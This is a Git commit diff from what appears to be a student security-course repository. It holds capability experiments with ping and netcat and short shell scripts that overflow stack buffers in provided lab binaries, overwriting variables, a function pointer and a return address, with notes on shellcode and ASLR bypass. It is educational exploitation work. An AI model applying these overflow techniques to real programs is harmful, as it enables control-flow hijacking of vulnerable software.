4 Commits

Author SHA1 Message Date
Leo
1d5f1bfa58 feat: sheet7 a1 ef
All checks were successful
zip and release / build-and-release (push) Successful in 4s
2026-06-12 11:31:14 +02:00
Unbreathable
91bd5ab2ee feat: sheet 7 task 1 a-c 2026-06-10 14:04:35 +02:00
Leo
0b2b9741d3 feat: solve ex 1
All checks were successful
zip and release / build-and-release (push) Successful in 6s
2026-06-05 10:42:30 +02:00
Unbreathable
4ff7e162ac feat: task 2 for sheet6 2026-06-04 18:58:56 +02:00
18 changed files with 91 additions and 1 deletions

4
.gitignore vendored
View File

@@ -3,4 +3,6 @@ sheet01/a2/Hash.java
*.class
passwd
sheet04/AuthWithTOTP.java
sheet04/key-exchange.pcap
sheet04/key-exchange.pcap
sheet06/a2/assign*
sheet07/a1/assign*

16
sheet06/a1/a.txt Normal file
View File

@@ -0,0 +1,16 @@
10:16:36 leo@group-20 ~ → sudo chmod u-s /bin/ping
10:18:59 leo@group-20 ~ → ping google.com
ping: socktype: SOCK_RAW
ping: socket: Operation not permitted
ping: => missing cap_net_raw+p capability or setuid?
10:19:03 leo@group-20 ~ → sudo setcap cap_net_raw+ep /bin/ping
10:19:48 leo@group-20 ~ → ping google.com
PING google.com (142.251.20.138) 56(84) bytes of data.
64 bytes from bx-in-f138.1e100.net (142.251.20.138): icmp_seq=1 ttl=112 time=10.5 ms
64 bytes from bx-in-f138.1e100.net (142.251.20.138): icmp_seq=2 ttl=112 time=9.83 ms
The capability is required because ping sends ICMP packets to function.
It has to create raw network sockets and for that the kernel needs the cap_net_raw capability.
The permitted set grants the executable the right to posess this capability.
The effective set is needed because ping is not programmed to automatically set the effective set on runtime which is needed for the program to open the raw socket immediately.

21
sheet06/a1/b.txt Normal file
View File

@@ -0,0 +1,21 @@
10:31:48 leo@group-20 ~ → ls -l /bin/netcat
lrwxrwxrwx 1 root root 24 Apr 8 2024 /bin/netcat -> /etc/alternatives/netcat
10:31:57 leo@group-20 ~ → ls -l /etc/alternatives/netcat
lrwxrwxrwx 1 root root 15 Apr 8 2024 /etc/alternatives/netcat -> /bin/nc.openbsd
10:32:11 leo@group-20 ~ → ls -l /bin/nc.openbsd
-rwxr-xr-x 1 root root 39560 Apr 8 2024 /bin/nc.openbsd
10:31:38 leo@group-20 ~ → sudo setcap cap_net_bind_service+ep /bin/nc.openbsd
10:32:46 leo@group-20 ~ → netcat -l 81
GET / HTTP/1.1
Host: 10.42.23.30:81
User-Agent: curl/8.20.0
Accept: */*
leo@leo-laptop:~$ curl 10.42.23.30:81
^C
On linux ports 0-1023 are privileged ports to which only the root user can bind by default.
By setting the cap_net_bind_service capability the executable can also bind to those lower ports.
/bin/netcat is only a symlink leading to /etc/alternatives/netcat which is a symlink leading to /bin/nc.openbsd.
The capabilities are stored in the file's inode. Because symlinks do not support extended attributes in this way the capability has to be stored on the target executable.

5
sheet06/a2/b.txt Normal file
View File

@@ -0,0 +1,5 @@
Java has bounds checking for arraycopy and other functions built-in, therefore when trying to do the same thing as before we get:
Exception in thread "main" java.lang.ArrayIndexOutOfBoundsException: arraycopy: last source index 144 out of bounds for char[128]
at java.base/java.lang.System.arraycopy(Native Method)
at assignment2b.main(assignment2b.java:14)

1
sheet06/a2/stack-a.sh Executable file
View File

@@ -0,0 +1 @@
echo "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | "./assignment2a"

1
sheet06/a2/stack-a.txt Normal file
View File

@@ -0,0 +1 @@
The gets function reads into a buffer with 128 bytes from stdin. So to create a buffer overflow, I just need to put in 128 characters (all of the A) and then what we want to be written where the 32 bit integer is at the end (since it's behind the buffer inside of the struct).

1
sheet06/a2/stack-c.sh Executable file
View File

@@ -0,0 +1 @@
./assignment2c AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

1
sheet06/a2/stack-c.txt Normal file
View File

@@ -0,0 +1 @@
Same idea as a here, just that we put in 64 characters this time since the buffer is only 64 characters big. This means 65 A's and the job is done.

2
sheet06/a2/stack-d.sh Executable file
View File

@@ -0,0 +1,2 @@
NUMBER=$(printf "\x74\x69\x6E\x49")
./assignment2d AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA$NUMBER

1
sheet06/a2/stack-d.txt Normal file
View File

@@ -0,0 +1 @@
Since we now want to change toChange to a deterministic value, specifically 0x496e6974, I just used printf to generate the ASCII characters for this number and then passed it straight to the program with some extra stuff in front to make the buffer overflow. You just have to put the bytes in reverse order due to little endian and stuff.

3
sheet07/a1/e.txt Normal file
View File

@@ -0,0 +1,3 @@
Shellcodes are raw machine instructions executed directly by the CPU, so they must match the specific instruction set architecture.
To spawn a shell the shellcode has to make system calls to the kernel.
Because syscall numbers and the CPU registers used to pass arguments vary entirely between different operating systems and architectures, a shellcode written for 32-bit Linux will not work on 64-bit Linux or Windows.

4
sheet07/a1/f.txt Normal file
View File

@@ -0,0 +1,4 @@
ASLR randomizes the base addresses of memory segments like the stack and shared libraries on every execution.
To defeat it an information leak vulnerability is usually required to read a valid memory address at runtime.
Since ASLR only shifts the memory regions as a whole, the relative offsets between functions remain constant.
By leaking a single pointer the base address can be calculated, which allows computing the exact runtime location of the target function or ROP gadgets.

2
sheet07/a1/stack-a.sh Executable file
View File

@@ -0,0 +1,2 @@
NUMBER=$(printf "\x74\x69\x6E\x49")
ENV_VAR="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA$NUMBER" "./assignment1a"

3
sheet07/a1/stack-a.txt Normal file
View File

@@ -0,0 +1,3 @@
I just injected the same thing into the Environment Variable as for the 2d task on the last worksheet. This works the exact same way here.
128 characters of 'A' to be put into the buffer and after that all of the bytes for the number we want to put into the variable.

2
sheet07/a1/stack-b.sh Executable file
View File

@@ -0,0 +1,2 @@
NUMBER=$(printf "\xDE\x11\x40")
echo "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA$NUMBER" | ./assignment1b

3
sheet07/a1/stack-b.txt Normal file
View File

@@ -0,0 +1,3 @@
I went into gdb with the file using `gdb -q assignment1b`. After doing `print success`, I found that 0x4011de is the pointer for the function.
I then created a script similar to 1d and just changed the number we inserted into the variable before into the function pointer. And that worked.

2
sheet07/a1/stack-c.sh Executable file
View File

@@ -0,0 +1,2 @@
NUMBER=$(printf "\x46\x11\x40")
echo "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA$NUMBER" | ./assignment1c

20
sheet07/a1/stack-c.txt Normal file
View File

@@ -0,0 +1,20 @@
After some Google and asking Mr. GPT I found out that the return address is usually stored at the allocated stack size + 8 bytes on x86. So I disassembled assignment1c and found the following assembly code:
0x0000000000401168 <+0>: push %rbp
0x0000000000401169 <+1>: mov %rsp,%rbp
0x000000000040116c <+4>: sub $0x90,%rsp
0x0000000000401173 <+11>: lea -0x90(%rbp),%rax
0x000000000040117a <+18>: mov %rax,%rdi
0x000000000040117d <+21>: call 0x401040 <gets@plt>
0x0000000000401182 <+26>: mov 0x8(%rbp),%rax
0x0000000000401186 <+30>: mov %rax,-0x8(%rbp)
0x000000000040118a <+34>: mov -0x8(%rbp),%rax
0x000000000040118e <+38>: lea 0xe7b(%rip),%rdx # 0x402010
0x0000000000401195 <+45>: mov %rax,%rsi
0x0000000000401198 <+48>: mov %rdx,%rdi
0x000000000040119b <+51>: mov $0x0,%eax
0x00000000004011a0 <+56>: call 0x401030 <printf@plt>
0x00000000004011a5 <+61>: nop
0x00000000004011a6 <+62>: leave
What we can see here is that with lea we allocate a size of 0x90 = 144 bytes. So with 144 + 8 being 152, I have to write 152 'A' characters and then put in my return address. So that's how the stack-c.sh file works.